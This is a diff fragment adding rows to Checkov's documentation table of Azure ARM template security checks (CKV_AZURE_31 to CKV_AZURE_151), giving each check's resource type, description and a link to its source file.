+|  39 | CKV_AZURE_31  | resource  | configurations                                                               | Ensure configuration 'log_connections' is set to 'ON' for PostgreSQL Database Server                         | arm   | [PostgreSQLServerLogConnectionsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerLogConnectionsEnabled.py)                                           |
+|  40 | CKV_AZURE_32  | resource  | Microsoft.DBforPostgreSQL/servers/configurations                             | Ensure server parameter 'connection_throttling' is set to 'ON' for PostgreSQL Database Server                | arm   | [PostgreSQLServerConnectionThrottlingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerConnectionThrottlingEnabled.py)                               |
+|  41 | CKV_AZURE_32  | resource  | configurations                                                               | Ensure server parameter 'connection_throttling' is set to 'ON' for PostgreSQL Database Server                | arm   | [PostgreSQLServerConnectionThrottlingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerConnectionThrottlingEnabled.py)                               |
+|  42 | CKV_AZURE_33  | resource  | Microsoft.Storage/storageAccounts/queueServices/providers/diagnosticsettings | Ensure Storage logging is enabled for Queue service for read, write and delete requests                      | arm   | [StorageAccountLoggingQueueServiceEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageAccountLoggingQueueServiceEnabled.py)                                     |
+|  43 | CKV_AZURE_34  | resource  | Microsoft.Storage/storageAccounts/blobServices/containers                    | Ensure that 'Public access level' is set to Private for blob containers                                      | arm   | [StorageBlobServiceContainerPrivateAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageBlobServiceContainerPrivateAccess.py)                                     |
+|  44 | CKV_AZURE_34  | resource  | blobServices/containers                                                      | Ensure that 'Public access level' is set to Private for blob containers                                      | arm   | [StorageBlobServiceContainerPrivateAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageBlobServiceContainerPrivateAccess.py)                                     |
+|  45 | CKV_AZURE_34  | resource  | containers                                                                   | Ensure that 'Public access level' is set to Private for blob containers                                      | arm   | [StorageBlobServiceContainerPrivateAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageBlobServiceContainerPrivateAccess.py)                                     |
+|  46 | CKV_AZURE_35  | resource  | Microsoft.Storage/storageAccounts                                            | Ensure default network access rule for Storage Accounts is set to deny                                       | arm   | [StorageAccountDefaultNetworkAccessDeny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageAccountDefaultNetworkAccessDeny.py)                                         |
+|  47 | CKV_AZURE_36  | resource  | Microsoft.Storage/storageAccounts                                            | Ensure 'Trusted Microsoft Services' is enabled for Storage Account access                                    | arm   | [StorageAccountAzureServicesAccessEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageAccountAzureServicesAccessEnabled.py)                                     |
+|  48 | CKV_AZURE_37  | resource  | Microsoft.Insights/logprofiles                                               | Ensure that Activity Log Retention is set 365 days or greater                                                | arm   | [MonitorLogProfileRetentionDays.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MonitorLogProfileRetentionDays.py)                                                         |
+|  49 | CKV_AZURE_38  | resource  | Microsoft.Insights/logprofiles                                               | Ensure audit profile captures all the activities                                                             | arm   | [MonitorLogProfileCategories.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MonitorLogProfileCategories.py)                                                               |
+|  50 | CKV_AZURE_39  | resource  | Microsoft.Authorization/roleDefinitions                                      | Ensure that no custom subscription owner roles are created                                                   | arm   | [CustomRoleDefinitionSubscriptionOwner.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CustomRoleDefinitionSubscriptionOwner.py)                                           |
+|  51 | CKV_AZURE_40  | resource  | Microsoft.KeyVault/vaults/keys                                               | Ensure that the expiration date is set on all keys                                                           | arm   | [KeyExpirationDate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyExpirationDate.py)                                                                                   |
+|  52 | CKV_AZURE_41  | resource  | Microsoft.KeyVault/vaults/secrets                                            | Ensure that the expiration date is set on all secrets                                                        | arm   | [SecretExpirationDate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecretExpirationDate.py)                                                                             |
+|  53 | CKV_AZURE_42  | resource  | Microsoft.KeyVault/vaults                                                    | Ensure the key vault is recoverable                                                                          | arm   | [KeyvaultRecoveryEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyvaultRecoveryEnabled.py)                                                                       |
+|  54 | CKV_AZURE_43  | resource  | Microsoft.Storage/storageAccounts                                            | Ensure Storage Accounts adhere to the naming rules                                                           | arm   | [StorageAccountName.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageAccountName.py)                                                                                 |
+|  55 | CKV_AZURE_44  | resource  | Microsoft.Storage/storageAccounts                                            | Ensure Storage Account is using the latest version of TLS encryption                                         | arm   | [StorageAccountMinimumTlsVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageAccountMinimumTlsVersion.py)                                                       |
+|  56 | CKV_AZURE_45  | resource  | Microsoft.Compute/virtualMachines                                            | Ensure that no sensitive credentials are exposed in VM custom_data                                           | arm   | [VMCredsInCustomData.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMCredsInCustomData.py)                                                                               |
+|  57 | CKV_AZURE_47  | resource  | Microsoft.DBforMariaDB/servers                                               | Ensure 'Enforce SSL connection' is set to 'ENABLED' for MariaDB servers                                      | arm   | [MariaDBSSLEnforcementEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MariaDBSSLEnforcementEnabled.py)                                                             |
+|  58 | CKV_AZURE_48  | resource  | Microsoft.DBforMariaDB/servers                                               | Ensure 'public network access enabled' is set to 'False' for MariaDB servers                                 | arm   | [MariaDBPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MariaDBPublicAccessDisabled.py)                                                               |
+|  59 | CKV_AZURE_49  | resource  | Microsoft.Compute/virtualMachineScaleSets                                    | Ensure Azure linux scale set does not use basic authentication(Use SSH Key Instead)                          | arm   | [AzureScaleSetPassword.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureScaleSetPassword.py)                                                                           |
+|  60 | CKV_AZURE_50  | resource  | Microsoft.Compute/virtualMachines                                            | Ensure Virtual Machine Extensions are not Installed                                                          | arm   | [AzureInstanceExtensions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureInstanceExtensions.py)                                                                       |
+|  61 | CKV_AZURE_52  | resource  | Microsoft.Sql/servers                                                        | Ensure MSSQL is using the latest version of TLS encryption                                                   | arm   | [MSSQLServerMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MSSQLServerMinTLSVersion.py)                                                                     |
+|  62 | CKV_AZURE_53  | resource  | Microsoft.DBforMySQL/servers                                                 | Ensure 'public network access enabled' is set to 'False' for mySQL servers                                   | arm   | [MySQLPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MySQLPublicAccessDisabled.py)                                                                   |
+|  63 | CKV_AZURE_54  | resource  | Microsoft.DBforMySQL/servers                                                 | Ensure MySQL is using the latest version of TLS encryption                                                   | arm   | [MySQLServerMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MySQLServerMinTLSVersion.py)                                                                     |
+|  64 | CKV_AZURE_56  | resource  | Microsoft.Web/sites/config                                                   | Ensure that function apps enables Authentication                                                             | arm   | [FunctionAppsEnableAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/FunctionAppsEnableAuthentication.py)                                                     |
+|  65 | CKV_AZURE_57  | resource  | Microsoft.Web/sites                                                          | Ensure that CORS disallows every resource to access app services                                             | arm   | [AppServiceDisallowCORS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceDisallowCORS.py)                                                                         |
+|  66 | CKV_AZURE_58  | resource  | Microsoft.Synapse/workspaces                                                 | Ensure that Azure Synapse workspaces enables managed virtual networks                                        | arm   | [SynapseWorkspaceEnablesManagedVirtualNetworks.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SynapseWorkspaceEnablesManagedVirtualNetworks.py)                           |
+|  67 | CKV_AZURE_59  | resource  | Microsoft.Storage/storageAccounts                                            | Ensure that Storage accounts disallow public access                                                          | arm   | [StorageAccountDisablePublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageAccountDisablePublicAccess.py)                                                   |
+|  68 | CKV_AZURE_62  | resource  | Microsoft.Web/sites                                                          | Ensure function apps are not accessible from all regions                                                     | arm   | [FunctionAppDisallowCORS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/FunctionAppDisallowCORS.py)                                                                       |
+|  69 | CKV_AZURE_63  | resource  | Microsoft.Web/sites/config                                                   | Ensure that App service enables HTTP logging                                                                 | arm   | [AppServiceHttpLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceHttpLoggingEnabled.py)                                                             |
+|  70 | CKV_AZURE_64  | resource  | Microsoft.StorageSync/storageSyncServices                                    | Ensure that Azure File Sync disables public network access                                                   | arm   | [StorageSyncPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageSyncPublicAccessDisabled.py)                                                       |
+|  71 | CKV_AZURE_65  | resource  | Microsoft.Web/sites/config                                                   | Ensure that App service enables detailed error messages                                                      | arm   | [AppServiceDetailedErrorMessagesEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceDetailedErrorMessagesEnabled.py)                                         |
+|  72 | CKV_AZURE_66  | resource  | Microsoft.Web/sites/config                                                   | Ensure that App service enables failed request tracing                                                       | arm   | [AppServiceEnableFailedRequest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceEnableFailedRequest.py)                                                           |
+|  73 | CKV_AZURE_67  | resource  | Microsoft.Web/sites                                                          | Ensure that 'HTTP Version' is the latest, if used to run the Function app                                    | arm   | [FunctionAppHttpVersionLatest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/FunctionAppHttpVersionLatest.py)                                                             |
+|  74 | CKV_AZURE_67  | resource  | Microsoft.Web/sites/slots                                                    | Ensure that 'HTTP Version' is the latest, if used to run the Function app                                    | arm   | [FunctionAppHttpVersionLatest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/FunctionAppHttpVersionLatest.py)                                                             |
+|  75 | CKV_AZURE_68  | resource  | Microsoft.DBforPostgreSQL/servers                                            | Ensure that PostgreSQL server disables public network access                                                 | arm   | [PostgreSQLServerPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerPublicAccessDisabled.py)                                             |
+|  76 | CKV_AZURE_70  | resource  | Microsoft.Web/sites                                                          | Ensure that Function apps is only accessible over HTTPS                                                      | arm   | [FunctionAppsAccessibleOverHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/FunctionAppsAccessibleOverHttps.py)                                                       |
+|  77 | CKV_AZURE_70  | resource  | Microsoft.Web/sites/config                                                   | Ensure that Function apps is only accessible over HTTPS                                                      | arm   | [FunctionAppsAccessibleOverHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/FunctionAppsAccessibleOverHttps.py)                                                       |
+|  78 | CKV_AZURE_70  | resource  | Microsoft.Web/sites/slots                                                    | Ensure that Function apps is only accessible over HTTPS                                                      | arm   | [FunctionAppsAccessibleOverHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/FunctionAppsAccessibleOverHttps.py)                                                       |
+|  79 | CKV_AZURE_71  | resource  | Microsoft.Web/sites                                                          | Ensure that Managed identity provider is enabled for web apps                                                | arm   | [AppServiceIdentityProviderEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceIdentityProviderEnabled.py)                                                   |
+|  80 | CKV_AZURE_72  | resource  | Microsoft.Web/sites                                                          | Ensure that remote debugging is not enabled for app services                                                 | arm   | [AppServiceRemoteDebuggingNotEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceRemoteDebuggingNotEnabled.py)                                               |
+|  81 | CKV_AZURE_73  | resource  | Microsoft.Automation/automationAccounts/variables                            | Ensure that Automation account variables are encrypted                                                       | arm   | [AutomationEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AutomationEncrypted.py)                                                                               |
+|  82 | CKV_AZURE_74  | resource  | Microsoft.Kusto/clusters                                                     | Ensure that Azure Data Explorer (Kusto) uses disk encryption                                                 | arm   | [DataExplorerUsesDiskEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/DataExplorerUsesDiskEncryption.py)                                                         |
+|  83 | CKV_AZURE_75  | resource  | Microsoft.Kusto/clusters                                                     | Ensure that Azure Data Explorer uses double encryption                                                       | arm   | [AzureDataExplorerDoubleEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureDataExplorerDoubleEncryptionEnabled.py)                                     |
+|  84 | CKV_AZURE_76  | resource  | Microsoft.Batch/batchAccounts                                                | Ensure that Azure Batch account uses key vault to encrypt data                                               | arm   | [AzureBatchAccountUsesKeyVaultEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureBatchAccountUsesKeyVaultEncryption.py)                                       |
+|  85 | CKV_AZURE_78  | resource  | Microsoft.Web/sites                                                          | Ensure FTP deployments are disabled                                                                          | arm   | [AppServiceFTPSState.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceFTPSState.py)                                                                               |
+|  86 | CKV_AZURE_79  | resource  | Microsoft.Security/pricings                                                  | Ensure that Azure Defender is set to On for SQL servers on machines                                          | arm   | [AzureDefenderOnSqlServersVMS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureDefenderOnSqlServersVMS.py)                                                             |
+|  87 | CKV_AZURE_80  | resource  | Microsoft.Web/sites/config                                                   | Ensure that 'Net Framework' version is the latest, if used as a part of the web app                          | arm   | [AppServiceDotnetFrameworkVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceDotnetFrameworkVersion.py)                                                     |
+|  88 | CKV_AZURE_81  | resource  | Microsoft.Web/sites                                                          | Ensure that 'PHP version' is the latest, if used to run the web app                                          | arm   | [AppServicePHPVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServicePHPVersion.py)                                                                             |
+|  89 | CKV_AZURE_82  | resource  | Microsoft.Web/sites                                                          | Ensure that 'Python version' is the latest, if used to run the web app                                       | arm   | [AppServicePythonVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServicePythonVersion.py)                                                                       |
+|  90 | CKV_AZURE_83  | resource  | Microsoft.Web/sites                                                          | Ensure that 'Java version' is the latest, if used to run the web app                                         | arm   | [AppServiceJavaVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceJavaVersion.py)                                                                           |
+|  91 | CKV_AZURE_84  | resource  | Microsoft.Security/pricings                                                  | Ensure that Azure Defender is set to On for Storage                                                          | arm   | [AzureDefenderOnStorage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureDefenderOnStorage.py)                                                                         |
+|  92 | CKV_AZURE_85  | resource  | Microsoft.Security/pricings                                                  | Ensure that Azure Defender is set to On for Kubernetes                                                       | arm   | [AzureDefenderOnKubernetes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureDefenderOnKubernetes.py)                                                                   |
+|  93 | CKV_AZURE_87  | resource  | Microsoft.Security/pricings                                                  | Ensure that Azure Defender is set to On for Key Vault                                                        | arm   | [AzureDefenderOnKeyVaults.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureDefenderOnKeyVaults.py)                                                                     |
+|  94 | CKV_AZURE_88  | resource  | Microsoft.Web/sites/config                                                   | Ensure that app services use Azure Files                                                                     | arm   | [AppServiceUsedAzureFiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceUsedAzureFiles.py)                                                                     |
+|  95 | CKV_AZURE_89  | resource  | Microsoft.Cache/redis                                                        | Ensure that Azure Cache for Redis disables public network access                                             | arm   | [RedisCachePublicNetworkAccessEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/RedisCachePublicNetworkAccessEnabled.py)                                             |
+|  96 | CKV_AZURE_92  | resource  | Microsoft.Compute/virtualMachines                                            | Ensure that Virtual Machines use managed disks                                                               | arm   | [VMStorageOsDisk.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMStorageOsDisk.py)                                                                                       |
+|  97 | CKV_AZURE_93  | resource  | Microsoft.Compute/disks                                                      | Ensure that managed disks use a specific set of disk encryption sets for the customer-managed key encryption | arm   | [AzureManagedDiskEncryptionSet.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureManagedDiskEncryptionSet.py)                                                           |
+|  98 | CKV_AZURE_94  | resource  | Microsoft.DBforMySQL/flexibleServers                                         | Ensure that My SQL server enables geo-redundant backups                                                      | arm   | [MySQLGeoBackupEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MySQLGeoBackupEnabled.py)                                                                           |
+|  99 | CKV_AZURE_95  | resource  | Microsoft.Compute/virtualMachineScaleSets                                    | Ensure that automatic OS image patching is enabled for Virtual Machine Scale Sets                            | arm   | [VMScaleSetsAutoOSImagePatchingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMScaleSetsAutoOSImagePatchingEnabled.py)                                           |
+| 100 | CKV_AZURE_96  | resource  | Microsoft.DBforMySQL/flexibleServers                                         | Ensure that MySQL server enables infrastructure encryption                                                   | arm   | [MySQLEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MySQLEncryptionEnabled.py)                                                                         |
+| 101 | CKV_AZURE_97  | resource  | Microsoft.Compute/virtualMachineScaleSets                                    | Ensure that Virtual machine scale sets have encryption at host enabled                                       | arm   | [VMEncryptionAtHostEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMEncryptionAtHostEnabled.py)                                                                   |
+| 102 | CKV_AZURE_97  | resource  | Microsoft.Compute/virtualMachines                                            | Ensure that Virtual machine scale sets have encryption at host enabled                                       | arm   | [VMEncryptionAtHostEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMEncryptionAtHostEnabled.py)                                                                   |
+| 103 | CKV_AZURE_99  | resource  | Microsoft.DocumentDB/databaseAccounts                                        | Ensure Cosmos DB accounts have restricted access                                                             | arm   | [CosmosDBAccountsRestrictedAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CosmosDBAccountsRestrictedAccess.py)                                                     |
+| 104 | CKV_AZURE_100 | resource  | Microsoft.DocumentDb/databaseAccounts                                        | Ensure that Cosmos DB accounts have customer-managed keys to encrypt data at rest                            | arm   | [CosmosDBHaveCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CosmosDBHaveCMK.py)                                                                                       |
+| 105 | CKV_AZURE_101 | resource  | Microsoft.DocumentDB/databaseAccounts                                        | Ensure that Azure Cosmos DB disables public network access                                                   | arm   | [CosmosDBDisablesPublicNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CosmosDBDisablesPublicNetwork.py)                                                           |
+| 106 | CKV_AZURE_102 | resource  | Microsoft.DBforPostgreSQL/servers                                            | Ensure that PostgreSQL server enables geo-redundant backups                                                  | arm   | [PostgressSQLGeoBackupEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgressSQLGeoBackupEnabled.py)                                                             |
+| 107 | CKV_AZURE_103 | resource  | Microsoft.DataFactory/factories                                              | Ensure that Azure Data Factory uses Git repository for source control                                        | arm   | [DataFactoryUsesGitRepository.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/DataFactoryUsesGitRepository.py)                                                             |
+| 108 | CKV_AZURE_104 | resource  | Microsoft.DataFactory/factories                                              | Ensure that Azure Data factory public network access is disabled                                             | arm   | [DataFactoryNoPublicNetworkAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/DataFactoryNoPublicNetworkAccess.py)                                                     |
+| 109 | CKV_AZURE_105 | resource  | Microsoft.DataLakeStore/accounts                                             | Ensure that Data Lake Store accounts enables encryption                                                      | arm   | [DataLakeStoreEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/DataLakeStoreEncryption.py)                                                                       |
+| 110 | CKV_AZURE_107 | resource  | Microsoft.ApiManagement/service                                              | Ensure that API management services use virtual networks                                                     | arm   | [APIServicesUseVirtualNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/APIServicesUseVirtualNetwork.py)                                                             |
+| 111 | CKV_AZURE_109 | resource  | Microsoft.KeyVault/vaults                                                    | Ensure that key vault allows firewall rules settings                                                         | arm   | [KeyVaultEnablesFirewallRulesSettings.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyVaultEnablesFirewallRulesSettings.py)                                             |
+| 112 | CKV_AZURE_110 | resource  | Microsoft.KeyVault/vaults                                                    | Ensure that key vault enables purge protection                                                               | arm   | [KeyVaultEnablesPurgeProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyVaultEnablesPurgeProtection.py)                                                         |
+| 113 | CKV_AZURE_111 | resource  | Microsoft.KeyVault/vaults                                                    | Ensure that key vault enables soft delete                                                                    | arm   | [KeyVaultEnablesSoftDelete.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyVaultEnablesSoftDelete.py)                                                                   |
+| 114 | CKV_AZURE_112 | resource  | Microsoft.KeyVault/vaults/keys                                               | Ensure that key vault key is backed by HSM                                                                   | arm   | [KeyBackedByHSM.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyBackedByHSM.py)                                                                                         |
+| 115 | CKV_AZURE_113 | resource  | Microsoft.Sql/servers                                                        | Ensure that SQL server disables public network access                                                        | arm   | [SQLServerHasPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerHasPublicAccessDisabled.py)                                                     |
+| 116 | CKV_AZURE_114 | resource  | Microsoft.KeyVault/vaults/secrets                                            | Ensure that key vault secrets have "content_type" set                                                        | arm   | [SecretContentType.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecretContentType.py)                                                                                   |
+| 117 | CKV_AZURE_121 | resource  | Microsoft.Network/frontDoors                                                 | Ensure that Azure Front Door enables WAF                                                                     | arm   | [AzureFrontDoorEnablesWAF.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureFrontDoorEnablesWAF.py)                                                                     |
+| 118 | CKV_AZURE_123 | resource  | Microsoft.Network/FrontDoorWebApplicationFirewallPolicies                    | Ensure that Azure Front Door uses WAF in "Detection" or "Prevention" modes                                   | arm   | [FrontdoorUseWAFMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/FrontdoorUseWAFMode.py)                                                                               |
+| 119 | CKV_AZURE_125 | resource  | Microsoft.ServiceFabric/clusters                                             | Ensures that Service Fabric use three levels of protection available                                         | arm   | [AzureServiceFabricClusterProtectionLevel.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureServiceFabricClusterProtectionLevel.py)                                     |
+| 120 | CKV_AZURE_129 | resource  | Microsoft.DBforMariaDB/servers                                               | Ensure that MariaDB server enables geo-redundant backups                                                     | arm   | [MariaDBGeoBackupEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MariaDBGeoBackupEnabled.py)                                                                       |
+| 121 | CKV_AZURE_130 | resource  | Microsoft.DBforPostgreSQL/servers                                            | Ensure that PostgreSQL server enables infrastructure encryption                                              | arm   | [PostgreSQLEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLEncryptionEnabled.py)                                                               |
+| 122 | CKV_AZURE_131 | parameter | secureString                                                                 | SecureString parameter should not have hardcoded default values                                              | arm   | [SecureStringParameterNoHardcodedValue.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/parameter/SecureStringParameterNoHardcodedValue.py)                                          |
+| 123 | CKV_AZURE_132 | resource  | Microsoft.DocumentDB/databaseAccounts                                        | Ensure cosmosdb does not allow privileged escalation by restricting management plane changes                 | arm   | [CosmosDBDisableAccessKeyWrite.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CosmosDBDisableAccessKeyWrite.py)                                                           |
+| 124 | CKV_AZURE_133 | resource  | Microsoft.Network/frontdoorWebApplicationFirewallPolicies                    | Ensure Front Door WAF prevents message lookup in Log4j2. See CVE-2021-44228 aka log4jshell                   | arm   | [FrontDoorWAFACLCVE202144228.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/FrontDoorWAFACLCVE202144228.py)                                                               |
+| 125 | CKV_AZURE_134 | resource  | Microsoft.CognitiveServices/accounts                                         | Ensure that Cognitive Services accounts disable public network access                                        | arm   | [CognitiveServicesDisablesPublicNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CognitiveServicesDisablesPublicNetwork.py)                                         |
+| 126 | CKV_AZURE_135 | resource  | Microsoft.Network/ApplicationGatewayWebApplicationFirewallPolicies           | Ensure Application Gateway WAF prevents message lookup in Log4j2. See CVE-2021-44228 aka log4jshell          | arm   | [AppGatewayWAFACLCVE202144228.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppGatewayWAFACLCVE202144228.py)                                                             |
+| 127 | CKV_AZURE_137 | resource  | Microsoft.ContainerRegistry/registries                                       | Ensure ACR admin account is disabled                                                                         | arm   | [ACRAdminAccountDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/ACRAdminAccountDisabled.py)                                                                       |
+| 128 | CKV_AZURE_138 | resource  | Microsoft.ContainerRegistry/registries                                       | Ensures that ACR disables anonymous pulling of images                                                        | arm   | [ACRAnonymousPullDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/ACRAnonymousPullDisabled.py)                                                                     |
+| 129 | CKV_AZURE_139 | resource  | Microsoft.ContainerRegistry/registries                                       | Ensure ACR set to disable public networking                                                                  | arm   | [ACRPublicNetworkAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/ACRPublicNetworkAccessDisabled.py)                                                         |
+| 130 | CKV_AZURE_140 | resource  | Microsoft.DocumentDB/databaseAccounts                                        | Ensure that Local Authentication is disabled on CosmosDB                                                     | arm   | [CosmosDBLocalAuthDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CosmosDBLocalAuthDisabled.py)                                                                   |
+| 131 | CKV_AZURE_141 | resource  | Microsoft.ContainerService/managedClusters                                   | Ensure AKS local admin account is disabled                                                                   | arm   | [AKSLocalAdminDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSLocalAdminDisabled.py)                                                                           |
+| 132 | CKV_AZURE_145 | resource  | Microsoft.Web/sites                                                          | Ensure Function app is using the latest version of TLS encryption                                            | arm   | [FunctionAppMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/FunctionAppMinTLSVersion.py)                                                                     |
+| 133 | CKV_AZURE_145 | resource  | Microsoft.Web/sites/slots                                                    | Ensure Function app is using the latest version of TLS encryption                                            | arm   | [FunctionAppMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/FunctionAppMinTLSVersion.py)                                                                     |
+| 134 | CKV_AZURE_149 | resource  | Microsoft.Compute/virtualMachineScaleSets                                    | Ensure that Virtual machine does not enable password authentication                                          | arm   | [VMDisablePasswordAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMDisablePasswordAuthentication.py)                                                       |
+| 135 | CKV_AZURE_149 | resource  | Microsoft.Compute/virtualMachines                                            | Ensure that Virtual machine does not enable password authentication                                          | arm   | [VMDisablePasswordAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMDisablePasswordAuthentication.py)                                                       |
+| 136 | CKV_AZURE_151 | resource  | Microsoft.Compute/virtualMachines                                            | Ensure Windows VM enables encryption                                                                         | arm   | [WinVMEncryptionAtHost.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/WinVMEncryptionAtHost.py)                                                                           |
